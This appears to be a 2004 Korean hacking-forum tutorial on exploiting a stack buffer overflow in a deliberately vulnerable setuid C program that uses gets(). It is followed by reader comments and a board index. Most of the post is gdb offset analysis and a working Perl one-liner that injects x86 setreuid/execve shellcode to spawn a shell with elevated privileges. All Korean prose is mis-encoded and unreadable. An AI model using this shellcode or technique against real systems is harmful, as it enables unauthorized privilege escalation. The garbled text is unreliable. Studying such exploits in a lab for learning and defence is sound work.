1581, 74/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ssuckies
   http://www.ganseo.com
   BOF ÇØ°á ¹«ÀÛÁ¤ µû¶óÇϱâ #1

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=181 [º¹»ç]


Produced by ganseo
e-mail : postmaster@ganseo.com
homepage : http://www.ganseo.com

¾Æ·¡ ¹®¼­¿¡¼­ ÁÖ¼®Ã³¸®µÈ ºÎºÐÀÌ ¼³¸íÀÔ´Ï´Ù.
Ãʺ¸ÀÚµéÀÌ ½±°Ô µû¶ó ÇÒ ¼ö ÀÖµµ·Ï Çѹø ¸¸µé¾î ºÃ½À´Ï´Ù.
Á¦ ¿ö°ÔÀÓ ¼­¹ö¿¡¼­ Å×½ºÆ® ÇغýÀ´Ï´Ù.
µÎ°¡Áö ¹öÁ¯À¸·Î ÁغñÇØ ºÃ½À´Ï´Ù.
Á÷Á¢ ¹öÆÛ¿¡ ½©Äڵ带 Áý¾î³Ö°í ÇÏ´Â ¹æ¹ý°ú egg ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ´Â ¹æ¹ýÀÔ´Ï´Ù.

gcc ¹öÁ¯ Á¤º¸ÀÔ´Ï´Ù.
[root@localhost .test]# gcc -v      
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)

[root@localhost /]# mkdir .test
[root@localhost /]# cd .test
//test ȯ°æÀ» ¸¸µé¾î º¸°Ú½À´Ï´Ù. ¾²Áö ¸»¾Æ¾ßÇÒ getsÇÔ¼ö¸¦ ½è½À´Ï´Ù.^^
[root@localhost .test]# cat > testApp.c        
#include <stdio.h>
void main(int argc , char** argv)
{
        char buffer[200];

        printf("type ur words : ");
        gets(buffer);
        printf("words = %s\n" , buffer);
}
[root@localhost .test]# gcc -o testApp testApp.c
testApp.c: In function `main':
testApp.c:3: warning: return type of `main' is not `int'
/tmp/ccFrX0ch.o: In function `main':
/tmp/ccFrX0ch.o(.text+0x24): the `gets' function is dangerous and should not be used.
[root@localhost .test]# chmod 4750 testApp
[root@localhost .test]# chown recluse8 testApp
[root@localhost .test]# chgrp recluse7 testApp
[root@localhost .test]# ls -al
ÇÕ°è 28
drwxr-xr-x    2 root     root         4096  4¿ù 10 00:08 .
drwxr-xr-x   21 root     root         4096  4¿ù  9 23:17 ..
-rwsr-x---    1 recluse8 recluse7    13842  4¿ù 10 00:08 testApp
-rw-r--r--    1 root     root          155  4¿ù 10 00:08 testApp.c
[root@localhost .test]#




//ÇÁ·Î±×·¥À» ÆÞÀ» °¡Áö°í ½ÇÇèÇغ¸¾Ò½À´Ï´Ù.
[root@localhost .test]# (perl -e 'print "A"x300';cat)|./testApp

type ur words : words = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù
[root@localhost .test]#

//¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù°¡ ³ª´Â°É º¸´Ï bof°¡ ÀϾ´Ï´Ù.



/*
*ù¹ø° ¹æ¹ýÀÔ´Ï´Ù.
*ÀÏ´Ü gdb·Î disassemble Çؼ­ ¿ì¸®°¡ ³ÖÀ» ¹öÆÛÀÇ ÁÖ¼Ò¿Í ret address°¡ µé¾î°¥ ºÎºÐÀ» ¾Ë¾Æº¸µµ·Ï ÇÏ°Ú½À´Ï´Ù.
*ÁÖº¯ Áö½ÄÀº ganseo.comÀÇ ¹®¼­¸¦ ÂüÁ¶Çϼ¼¿ä.
*¾ÕÀ¸·Î ¿ì¸®´Â A·Î ü¿ü´ø ºÎºÐ¿¡ ¿ì¸®ÀÇ ½©Äڵ带 ³ÖÀ»Å×°í mainÇÔ¼öÀÇ ret addressºÎºÐ¿¡  
*¿ì¸®°¡ ³ÖÀº ½©ÄÚµåÀÇ ÁÖ¼Ò¸¦ ³Ö¾îÁÙ ¿¹Á¤ÀÔ´Ï´Ù.^^
*/
[root@localhost .test]# gdb -q testApp
(gdb) disass main
Dump of assembler code for function main:
0x8048490 <main>:       push   %ebp
0x8048491 <main+1>:     mov    %esp,%ebp
0x8048493 <main+3>:     sub    $0xd8,%esp
//buf¸¦ ÄÄÆÄÀÏ·¯°¡ dummy¿Í ÇÔ²² À̸¸Å­ Àâ´Â´Ù. 10Áø¼ö·Î 216
//±×·¯¸é ¾ÕÀ¸·Î ã¾Æº¼ ebp - 0xd8À» ÇÑ°÷¿¡ ÀԷ¹ÞÀº °ªÀÌ µé¾î°¥ °ÍÀÌ¶ó ¿¹»óÇÒ¼ö ÀÖ´Ù.
0x8048499 <main+9>:     sub    $0xc,%esp
0x804849c <main+12>:    push   $0x8048548
0x80484a1 <main+17>:    call   0x804836c <printf>
0x80484a6 <main+22>:    add    $0x10,%esp
0x80484a9 <main+25>:    sub    $0xc,%esp
0x80484ac <main+28>:    lea    0xffffff28(%ebp),%eax
0x80484b2 <main+34>:    push   %eax
0x80484b3 <main+35>:    call   0x804833c <gets>
0x80484b8 <main+40>:    add    $0x10,%esp
0x80484bb <main+43>:    sub    $0x8,%esp
0x80484be <main+46>:    lea    0xffffff28(%ebp),%eax
0x80484c4 <main+52>:    push   %eax
0x80484c5 <main+53>:    push   $0x8048559
0x80484ca <main+58>:    call   0x804836c <printf>
0x80484cf <main+63>:    add    $0x10,%esp
0x80484d2 <main+66>:    leave  
0x80484d3 <main+67>:    ret    
0x80484d4 <main+68>:    nop    
0x80484d5 <main+69>:    nop    
0x80484d6 <main+70>:    nop    
0x80484d7 <main+71>:    nop    
0x80484d8 <main+72>:    nop    
0x80484d9 <main+73>:    nop    
0x80484da <main+74>:    nop    
0x80484db <main+75>:    nop    
0x80484dc <main+76>:    nop    
0x80484dd <main+77>:    nop    
0x80484de <main+78>:    nop    
0x80484df <main+79>:    nop    
End of assembler dump.
(gdb)

//ebp¸¦ ã¾Æ¼­ ret address°¡ ¾îµðÀÖ´ÂÁö ÃßÃøÇغ¸ÀÚ.
(gdb) b *(main+3)
0x08048493 in main ()
(gdb) info reg
eax            0x40158ac0       1075153600
ecx            0x0      0
edx            0x0      0
ebx            0x40159fd0       1075158992
esp            0xbffffab8       0xbffffab8        
ebp            0xbffffab8       0xbffffab8                //¿©±â°¡ ebp´Ù. ±×·¸´Ù¸é ebp + 4 ºÎºÐ¿¡ ¿ì¸®°¡ ¸¸µé ½©ÄÚµåÀÇ address¸¦ ³Ö¾îÁÖ¸é µÇ°Ú´Ù.
esi            0x40015e4c       1073831500
edi            0xbffffb24       -1073743068
eip            0x8048493        0x8048493
eflags         0x396    918
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x400458fe       1074026750
foseg          0x2b     43
fooff          0x808fc74        134806644
fop            0x2e9    745
xmm0           0x00000000000000000000000000000000
xmm1           0x00000000000000000000000000000000
xmm2           0x00000000000000000000000000000000
xmm3           0x00000000000000000000000000000000
xmm4           0x00000000000000000000000000000000
xmm5           0x00000000000000000000000000000000
xmm6           0x00000000000000000000000000000000
xmm7           0x00000000000000000000000000000000
mxcsr          0x1f80   8064
(gdb)




(gdb) b *(main+58)
Breakpoint 1 at 0x80484ca
(gdb) r
Starting program: /.test/testApp
type ur words : AAAAAAAAAAAAAAA

Breakpoint 1, 0x080484ca in main ()
(gdb)

(gdb) x/100bx 0xbffff9e0
(gdb) x/100bx 0xbffff9d0
0xbffff9d0:     0x59    0x85    0x04    0x08    0xe0    0xf9    0xff    0xbf
0xbffff9d8:     0x74    0x61    0xdf    0x03    0xa0    0xfa    0xff    0xbf
0xbffff9e0:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41        //ÃßÃøÇÑ´ë·Î ebp - 0xd8ºÎºÐ¿¡ A(0x41)ÀÌ µé¾î°¡ÀÖ´Ù.
0xbffff9e8:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x00
0xbffff9f0:     0xfc    0x1b    0x03    0x40    0xe0    0x63    0x01    0x40
0xbffff9f8:     0x01    0x00    0x00    0x00    0xa0    0x81    0x04    0x08
0xbffffa00:     0x94    0x60    0x01    0x40    0x8e    0xff    0x77    0x01
0xbffffa08:     0x8e    0xff    0x77    0x01    0xd0    0xfa    0xff    0xbf
0xbffffa10:     0xf8    0x5e    0x01    0x40    0x4c    0x82    0x04    0x08
0xbffffa18:     0x10    0x69    0x69    0x0d    0x5c    0xfa    0xff    0xbf
0xbffffa20:     0xec    0x46    0x03    0x40    0xe0    0x63    0x01    0x40
0xbffffa28:     0xc0    0x66    0x01    0x40    0x01    0x00    0x00    0x00
0xbffffa30:     0x00    0x00    0x00    0x00
(gdb)

//ÀÌÁ¦ ¿ì¸®°¡ ³ÖÀ» ½©ÄÚµåÀÇ ÁÖ¼Òµµ ¾Ë¾Æ³Â°í ½©ÄÚµå ÁÖ¼Ò°¡ µé¾î°¡¾ßÇÒ ºÎºÐÀÇ ÁÖ¼Òµµ ¾Ë¾Æ³ÂÀ¸´Ï
//°£´ÜÇÑ ÆÞ½ºÅ©¸³Æ®¸¦ ¸¸µé¾îº¸ÀÚ. ½©ÄÚµå´Â ¹®¼­¸¦ ÂüÁ¶ÇϽñæ...
[root@localhost .test]# id recluse8
uid=1008(recluse8) gid=1008(recluse8) groups=1008(recluse8)

//½©ÄÚµå byte 63
//mainÀÇ return address ±îÁöÀÇ byte  216 + 4 = 220
[root@localhost .test]# su recluse7
[recluse7@localhost .test]$ (perl -e 'print "\x90"x156';perl -e 'print "\x31\xc9\x66\xb9\xf0\x03\x31\xdb\x66\xbb\xf0\x03\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x00"';perl -e 'print "\xe0\xf9\xff\xbf"';cat)|./testApp

type ur words : words = 1?¹ð1?»ð1À°FÍë^1ÀFF  V
                                             ?N?ÛØ@Íè?ÿÿ/bin/sh
                                              ?
id
uid=1008(recluse8) gid=1007(recluse7) groups=1007(recluse7)

¼º°øÇß½À´Ï´Ù.


  Hit : 14447     Date : 2004/04/12 02:01



    
singalnnn ¹º ¼Ò¸°Áö ¸ð¸£°Î½À´Ï´Ù¿ä... 2004/04/13  
Totory ¸Ó¶ó´Â°Å¾ß -_- 2004/04/14  
dz¸²È­»ê À̰ɺ¸°í ¸ð¸¥´Ù¸é BOF°øºÎ ±âÃʺÎÅÍ Çϼ¼¿ä ½Ç±â¸¦ »ó¼¼È÷ ¼³¸íÇÑ°ÍÀε¥..¿Ö.. 2004/04/16
dlxorud90 ±âÃÊ ¾îµð¼­´Â¾îµð¼­ Çϴ°ÍÀÌÁÒ? 2004/04/20  
ssuckies www.ganseo.com ÀÔ´Ï´Ù.^^ 2004/04/22  
UNIXSVR4 ¤»¤»¤» shellcode´Â ±ÍÂúÀº°Å¿©... 2007/07/16  
UNIXSVR4 Á¤¸»´ë´ÜÇϽʴϴÙ.ÀÌ·¸°Ô ½±°Ô bof¸¦ ¼³¸íÇϽôٴÏ... Á¤¸» ¾î·Æ°Ô °øºÎÇߴµ¥.. 2007/07/16  
121   Linux Root Æнº¿öµå ºÐ½Ç½Ã Á¶Ä¡ ¹æ¹ý[9]     h41d35
09/10 13783
120   ¡éº¸Ãæ. ¿Ã¹Ù¸¥ °Ë»ö Á¶°ÇÀ¸·Î, find¸í·É¾î¸¦ »ç¿ëÇÏÀÚ.[13]     yl
09/09 13804
119   Webhacking.kr 51¹ø RPG°ÔÀÓ ³ª¿À±â[4]     Ǫ¸¥ÇÏ´Ã
03/31 13873
118   ³Ý¼¾µå Çϴ¹ý(Çϵµ¸¹ÀÌ ¹°¾îº¸½Ã±æ·¡;;)[13]     qkreoghks00
01/23 13896
117   ¸®´ª½º ¹æÈ­º®ÀÇ Á¾·ù...[4]     bsjzzz
01/12 13943
116   ÇØÄ¿½ºÄð Level1 Ç®ÀÌ     xodnr631
08/20 13981
115   ¿À¶óŬ Enterprise Edition Release 8.0[6]     netwow1
12/14 14095
114   [ÇÁ·ÎÁ§Æ®]»ó.Àý.Áö ÇØÅ·»çÀü//ÇØÅ·°øºÎ»çÀÌÆ® URL¸®½ºÆ®[5]     W.H.
10/30 14100
113   óÀ½À¸·Î ¿ïÁý ¹ÙÀÌ·¯½º ºÐ¼®[9]     dkdkfjgh
12/22 14167
112   ¸®´ª½º ¸í·É¾î ¸¶½ºÅÍ 7[8]     ¼ÒÀ¯
09/09 14205
111   ¸®´ª½º ¸í·É¾î ¸¶½ºÅÍ 6[7]     ¼ÒÀ¯
09/08 14310
110   [ÀÚÀÛ]¸®´ª½º ¾ÐÃà ¸í·É Á¤¸®.[2]     williamlee
12/29 14393
109   [[ÃʱÞ/°­ÁÂ]] À¯´Ð½º ±âº» Á¤¸®[8]     ¼ÒÀ¯
10/09 14441
  BOF ÇØ°á ¹«ÀÛÁ¤ µû¶óÇϱâ #1[7]     ssuckies
04/12 14446
107   ·¹º§5 ·¹À̽ºÄÁµð¼Ç¿¡ ´ëÇؼ­. [ÀÇ¿Ü·Î Áú¹®ÇϽô ºÐµéÀÌ ¸¹¾Æ¼­..][9]     yl
10/01 14460
106   ¸®´ª½º ¸í·É¾î ¸¶½ºÅÍ 8 [¸¶Áö¸·][44]     ¼ÒÀ¯
09/10 14494
105   [[ÃʱÞ/°­ÁÂ]] À¯´Ð½º ÁÖ¿ä ¸í·É¾î[7]     ¼ÒÀ¯
10/09 14542
104   * ¿¤¸®Æ®ÇØÄ¿°¡ µÇ´Â±æ *Ãßõ *[30]     HackerMapia
03/02 14643
103   ÀÎÅͳݿ¡ ¸®´ª½º ¼­¹ö ±¸ÃàÇϱâ[1]     ¼ÒÀ¯
07/07 14758
102   - ÇØÄ¿ÀÇ ¼öÁØ¹× ±â¹ý[322]     twinz
08/27 14841
[1]..[71][72][73] 74 [75][76][77][78][79][80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org